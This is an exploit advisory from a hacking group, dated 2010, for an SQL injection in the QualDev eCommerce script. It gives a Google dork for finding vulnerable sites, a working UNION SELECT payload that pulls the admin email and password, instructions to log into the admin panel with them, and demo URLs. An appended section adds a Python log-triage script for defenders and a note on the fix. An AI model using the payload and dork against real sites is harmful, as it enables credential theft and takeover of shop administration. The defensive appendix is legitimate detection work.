==========================================================================
QualDev eCommerce script SQL injection vulnerability
==========================================================================
# Exploit Title: QualDev eCommerce script SQL injection vulnerability
# Vendor: http://www.qualdev.com
# Date: 15.12.2010
# Version: all versions
# Category: webapps
# Google dork: inurl:"index.php?file=allfile"
# Tested on: FreeBSD 7.1
# Author: ErrNick
# Site: XakNet.ru, forum.xaknet.ru
# Contact: errnick [at] xaknet [dot] ru
# Greatz 2 all memberz of XakNet team (X1mk0 ~, Saint, baltazar, Shyler,
Kronus, mst & others)
# Intro:
- A parameter is not properly sanitised before being used in a SQL query.
- Input passed to the "id" parameter is not properly sanitised before being
  used in a SQL query. This can be exploited to manipulate SQL queries by
  injecting arbitrary SQL code.
# Exploit:
index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
Log in with the admin email & password here:
http://victim/adminpanel/
# Demo:
-
http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
Vizit us at http://xaknet.ru
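# Log triage (added example, not part of the original advisory):
For defenders checking whether a site was hit, this sketch scans a web access log for index.php?file=allfile requests whose "id" is not a plain integer, then lists later /adminpanel/ requests from the same client. The Apache combined log format, the constructed sample lines and the assumption that legitimate "id" values are non-negative integers are assumptions, not details from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample (combined log format); addresses are documentation placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Dec/2010:10:00:01 +0000] "GET /index.php?file=allfile&id=12 HTTP/1.1" 200 5120
192.0.2.66 - - [15/Dec/2010:10:02:17 +0000] "GET /index.php?file=allfile&id=-9999+union+select+1,2,3 HTTP/1.1" 200 731
192.0.2.66 - - [15/Dec/2010:10:02:40 +0000] "GET /index.php?file=allfile&id=7%20UNION%20SELECT%201 HTTP/1.1" 200 731
192.0.2.11 - - [15/Dec/2010:10:03:05 +0000] "GET /index.php?file=contact HTTP/1.1" 200 2048
192.0.2.10 - - [15/Dec/2010:10:03:30 +0000] "GET /adminpanel/ HTTP/1.1" 200 900
192.0.2.66 - - [15/Dec/2010:10:04:00 +0000] "POST /adminpanel/ HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
PLAIN_INT = re.compile(r"[0-9]{1,10}")  # assumed shape of a legitimate id


def triage(log_text):
    """Return (flagged, followups): allfile requests with a non-integer id, and
    later /adminpanel/ requests made by the clients that sent them."""
    flagged, followups, seen = [], [], set()
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, ts, target, status = m.groups()
        url = urlsplit(target)
        if "/adminpanel/" in url.path and client in seen:
            followups.append((client, ts, status))
            continue
        if not url.path.endswith("/index.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # decodes + and %XX
        if "allfile" not in params.get("file", []):
            continue
        for value in params.get("id", []):
            if not PLAIN_INT.fullmatch(value):
                flagged.append((client, ts, value))
                seen.add(client)
    return flagged, followups


if __name__ == "__main__":
    flagged, followups = triage(SAMPLE_LOG)
    for row in flagged:
        print("non-integer id:", row)
    for row in followups:
        print("admin panel request after flagged id:", row)
```

The same integer check, applied to "id" before it reaches the query (together with a parameterised statement), is the server-side fix for the flaw described in the Intro.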